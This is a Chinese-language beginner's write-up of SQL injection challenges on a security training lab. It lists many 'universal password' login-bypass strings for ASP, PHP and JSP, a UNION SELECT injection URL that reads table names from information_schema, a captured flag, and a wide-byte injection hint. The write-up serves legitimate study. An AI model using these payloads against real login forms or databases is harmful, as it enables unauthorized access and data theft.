网络安全实验室注入关 -----wiiteup

作为一个刷题的小白，相信有很多和我一样的小白，我就在这记录自己的刷题吧，一步步来，希望对大家有帮助
第一题

F12 查看源码

发现登录的是admin 尝试一下万能密码 怎么使用万能密码呢，刚刷提的小白也许不懂吧，反正我不懂 下面介绍几个万能密码
（1）直接登录框 输入admin’# 密码的话就随便填几个就行 无所谓的 验证码正确就可以 username = admin’ or ‘’=’
第二种 假如不知道是admin登录的话 直接账号输入万能用户名 密码随便一样可以

asp aspx万能密码
1： "or “a”="a
2： ')or(‘a’=‘a
3：or 1=1–
4：‘or 1=1–
5：a’or’ 1=1–
6： "or 1=1–
7：‘or’a’=‘a
8： “or”="a’=‘a
9：‘or’’=’
10：‘or’=‘or’
11: 1 or ‘1’=‘1’=1
12: 1 or ‘1’=‘1’ or 1=1
13: 'OR 1=1%00
14: "or 1=1%00
15: 'xor
PHP万能密码
‘or’=‘or’
'or 1=1/* 字符型 GPC是否开都可以使用
User: something
Pass: ’ OR ‘1’='1

jsp 万能密码
1’or’1’=‘1
admin’ OR 1=1/*
第二题：
F12审查元素
构造url:view-source:http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php/?id=1
开始了注入模式 ’出现错误 说明存在注入点
判断字段数
判断数据库名字

判断表名：http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php/?id=1%20union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=%27mydbs%27–+


flag: HKGGflagdfs56757fsdv
第三题：
御剑扫描了一下后台
好 啥也没发现 抓个包把那就

没发现什么，也是没有思路 只能曲看大佬的了
根据响应头中返回的 charset=gb2312 ，猜测可能是一个宽字节注入，通过验证后开始正常的注入流程 开始学习宽字节注入 一会继续发